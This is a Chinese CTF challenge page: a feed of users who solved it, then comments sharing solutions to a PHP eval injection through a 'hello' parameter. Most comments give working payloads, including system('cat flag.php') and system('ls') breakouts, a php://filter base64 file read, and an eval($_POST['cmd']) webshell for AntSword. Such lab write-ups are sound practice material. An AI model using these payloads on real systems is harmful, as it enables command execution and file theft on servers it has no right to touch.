评分(10)
解题动态
xjn12 攻破了该题 3小时前
SDLbyZ 攻破了该题 3小时前
771232546 攻破了该题 6小时前
19941759966 攻破了该题 6小时前
lancertyk 攻破了该题 22小时前
zdabajfk 攻破了该题 23小时前
---snow--- 攻破了该题 23小时前
1293273679 攻破了该题 1天前
homniloquy 攻破了该题 1天前
violet06 攻破了该题 1天前
Oliver23 攻破了该题 1天前
wwwwzh123 攻破了该题 1天前
sdxsdxl 攻破了该题 1天前
yaoyao0 攻破了该题 1天前
白露早 攻破了该题 1天前
liberator 攻破了该题 1天前
nidexun 攻破了该题 1天前
干饭人干饭魂 攻破了该题 1天前
harry2025 攻破了该题 2天前
评论
1293273679 1天前
举报
蚁剑直接 url/?hello=eval($_POST['cmd')
1nfinix 5天前
举报
构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//
lins11 22天前
举报
/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码
叱咤月海鱼鱼猫 1月前
举报
?hello=highlight_file('flag.php')
banfang 2月前
举报
点击场景后将代码发送给豆包等一分钟基本上就可以了
pks0 2月前
举报
?hello=1);highlight_file(%27flag.php%27);//
一个姓⎝李⎠的师傅~ 4月前
举报
知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d
pipipikaqiu 1月前
举报
写的好详细,太好了啊
一个姓⎝李⎠的师傅~ 1月前
举报
@想好思路再支付 有帮助就好,感谢老铁的认可!!!
想好思路再支付 1月前
举报
思路讲的真好啊李师傅
ubudj 4月前
举报
?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名
默认 4月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 4月前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功